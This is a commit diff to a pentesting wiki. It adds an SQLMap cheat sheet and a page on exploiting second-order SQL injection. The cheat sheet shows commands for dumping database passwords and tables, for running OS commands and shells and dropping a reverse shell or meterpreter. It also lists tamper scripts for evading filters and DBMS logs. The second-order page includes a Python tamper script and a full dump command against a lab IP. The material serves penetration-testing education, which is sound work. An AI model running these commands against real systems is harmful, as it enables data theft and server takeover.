GitBook: [master] 352 pages modified

SUMMARY.md

@@ -287,7 +287,8 @@
     * [RCE with PostgreSQL Extensions](pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
   * [MySQL injection](pentesting-web/sql-injection/mysql-injection/README.md)
     * [Mysql SSRF](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
-  * [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap.md)
+  * [SQLMap - Cheetsheat](pentesting-web/sql-injection/sqlmap/README.md)
+    * [Second Order Injection - SQLMap](pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md)
 * [SSRF \(Server Side Request Forgery\)](pentesting-web/ssrf-server-side-request-forgery.md)
 * [SSTI \(Server Side Template Injection\)](pentesting-web/ssti-server-side-template-injection.md)
 * [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)

pentesting-web/sql-injection/README.md

@@ -251,7 +251,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 
 ## Automated Exploitation
 
-Check the [SQLMap Cheetsheat](sqlmap.md) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
+Check the [SQLMap Cheetsheat](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
 
 ## Tech specific info
 

pentesting-web/sql-injection/sqlmap/README.md

@@ -0,0 +1,192 @@
+# SQLMap - Cheetsheat
+
+## Basic arguments for SQLmap
+
+### Generic
+
+```bash
+-u "<URL>" 
+-p "<PARAM TO TEST>" 
+--user-agent=SQLMAP 
+--random-agent 
+--threads=10 
+--risk=3 #MAX
+--level=5 #MAX
+--dbms="<KNOWN DB TECH>" 
+--os="<OS>"
+--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
+--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
+--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
+--proxy=PROXY
+```
+
+### Retrieve Information
+
+#### Internal
+
+```bash
+--current-user #Get current user
+--is-dba #Check if current user is Admin
+--hostname #Get hostname
+--users #Get usernames od DB
+--passwords #Get passwords of users in DB
+```
+
+#### DB data
+
+```bash
+--all #Retrieve everything
+--dump #Dump DBMS database table entries
+--dbs #Names of the available databases
+--tables #Tables of a database ( -D <DB NAME> )
+--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
+-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
+```
+
+## Injection place
+
+### From Burp/ZAP capture
+
+Capture the request and create a req.txt file
+
+```bash
+sqlmap -r req.txt --current-user
+```
+
+### GET Request Injection
+
+```bash
+sqlmap -u "http://example.com/?id=1" -p id
+sqlmap -u "http://example.com/?id=*" -p id
+```
+
+### POST Request Injection
+
+```bash
+sqlmap -u "http://example.com" --data "username=*&password=*"
+```
+
+### Injections in Headers and other HTTP Methods
+
+```bash
+#Inside cookie
+sqlmap  -u "http://example.com" --cookie "mycookies=*"
+
+#Inside some header
+sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
+sqlmap -u "http://example.com" --headers="referer:*"
+
+#PUT Method
+sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
+
+#The injection is located at the '*'
+```
+
+### Second order injection
+
+```bash
+python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
+sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
+```
+
+### Shell
+
+```bash
+#Exec command
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
+
+#Simple Shell
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
+
+#Dropping a reverse-shell / meterpreter
+python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
+```
+
+### Crawl a website with SQLmap and auto-exploit
+
+```bash
+sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
+
+--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
+--crawl = how deep you want to crawl a site
+--forms = Parse and test forms
+```
+
+## Customizing Injection
+
+### Set a suffix
+
+```bash
+python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
+```
+
+### Prefix
+
+```bash
+python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "
+```
+
+### Help finding boolean injection
+
+```bash
+# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
+sqlmap -r r.txt -p id --not-string ridiculous --batch
+```
+
+### Tamper
+
+```bash
+--tamper=name_of_the_tamper
+#In kali you can see all the tampers in /usr/share/sqlmap/tamper
+```
+
+| Tamper | Description |
+| :--- | :--- |
+| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
+| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
+| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
+| base64encode.py | Base64 all characters in a given payload |
+| between.py | Replaces greater than operator \('&gt;'\) with 'NOT BETWEEN 0 AND \#' |
+| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
+| chardoubleencode.py | Double url-encodes all characters in a given payload \(not processing already encoded\) |
+| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
+| commalessmid.py | Replaces instances like 'MID\(A, B, C\)' with 'MID\(A FROM B FOR C\)' |
+| concat2concatws.py | Replaces instances like 'CONCAT\(A, B\)' with 'CONCAT\_WS\(MID\(CHAR\(0\), 0, 0\), A, B\)' |
+| charencode.py | Url-encodes all characters in a given payload \(not processing already encoded\) |
+| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "%u0022" |
+| charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload \(not processing already encoded\). "\u0022" |
+| equaltolike.py | Replaces all occurances of operator equal \('='\) with operator 'LIKE' |
+| escapequotes.py | Slash escape quotes \(' and "\) |
+| greatest.py | Replaces greater than operator \('&gt;'\) with 'GREATEST' counterpart |
+| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
+| ifnull2ifisnull.py | Replaces instances like 'IFNULL\(A, B\)' with 'IF\(ISNULL\(A\), B, A\)' |
+| modsecurityversioned.py | Embraces complete query with versioned comment |
+| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
+| multiplespaces.py | Adds multiple spaces around SQL keywords |
+| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement \(e.g. .replace\("SELECT", ""\)\) filters |
+| percentage.py | Adds a percentage sign \('%'\) infront of each character |
+| overlongutf8.py | Converts all characters in a given payload \(not processing already encoded\) |
+| randomcase.py | Replaces each keyword character with random case value |
+| randomcomments.py | Add random comments to SQL keywords |
+| securesphere.py | Appends special crafted string |
+| sp\_password.py | Appends 'sp\_password' to the end of the payload for automatic obfuscation from DBMS logs |
+| space2comment.py | Replaces space character \(' '\) with comments |
+| space2dash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a random string and a new line \('\n'\) |
+| space2hash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) |
+| space2morehash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a random string and a new line \('\n'\) |
+| space2mssqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| space2mssqlhash.py | Replaces space character \(' '\) with a pound character \('\#'\) followed by a new line \('\n'\) |
+| space2mysqlblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| space2mysqldash.py | Replaces space character \(' '\) with a dash comment \('--'\) followed by a new line \('\n'\) |
+| space2plus.py | Replaces space character \(' '\) with plus \('+'\) |
+| space2randomblank.py | Replaces space character \(' '\) with a random blank character from a valid set of alternate characters |
+| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts \(&& and |
+| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
+| unmagicquotes.py | Replaces quote character \('\) with a multi-byte combo %bf%27 together with generic comment at the end \(to make it work\) |
+| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
+| varnish.py | Append a HTTP header 'X-originating-IP' |
+| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
+| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
+| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' |
+

pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md

@@ -0,0 +1,78 @@
+# Second Order Injection - SQLMap
+
+**SQLMap can exploit Second Order SQLis.**  
+You need to provide:
+
+* The **request** where the **sqlinjection payload** is going to be saved
+* The **request** where it can find the **output** of this injection
+
+The request where the SQL injection payload is saved is **indicated as in any other injection in sqlmap**. The request **where sqlmap can read the output** of the injection can be indicated with `--second-url` or with `--second-req` if you need to indicate a complete request.
+
+**Simple second order example:**
+
+```bash
+#Get the outout with a GET to a url
+sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
+
+#Get the ouput sending a custom request from a file
+sqlmap -r login.txt -p username --second-req details.txt
+```
+
+In several cases **this won't be enough** because you will need to **perform other actions** apart from sending the payload and read a different page.
+
+When this is needed you can user a sqlmap tamper. For example the following script will logout, register and login using a cookie.
+
+```python
+#!/usr/bin/env python
+
+import re
+import requests
+from lib.core.enums import PRIORITY
+__priority__ = PRIORITY.NORMAL
+
+def dependencies():
+    pass
+
+def login_account(payload):
+    proxies = {'http':'http://127.0.0.1:8080'}
+    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
+
+    params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
+    url = "http://10.10.10.10/create.php"
+    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+
+    url = "http://10.10.10.10/exit.php"
+    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
+
+def tamper(payload, **kwargs):
+    headers = kwargs.get("headers", {})
+    login_account(payload)
+    return payload
+```
+
+A **SQLMap tamper is always executed before starting a injection with a payload** a**nd it has to return a payload**. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.
+
+So, if for some reason we need a more complex flow to exploit the second order SQLinjection like:
+
+* Create an account with the SQLi payload inside the "email" field
+* Logout
+* Login with that account
+* Send a request to execute the SQL injection
+
+**This sqlmap line will help:**
+
+```bash
+sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
+###########
+# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
+# -r login.txt : Indicates the request to send the SQLi payload
+# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
+# --second-req second.txt : Request to send to execute the SQLi and get the ouput
+# --proxy http://127.0.0.1:8080 : Use this proxy
+# --technique=U : Help sqlmap indicating the technique to use
+# --dbms mysql : Help sqlmap indicating the dbms
+# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
+# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
+# -a : Dump all
+```
+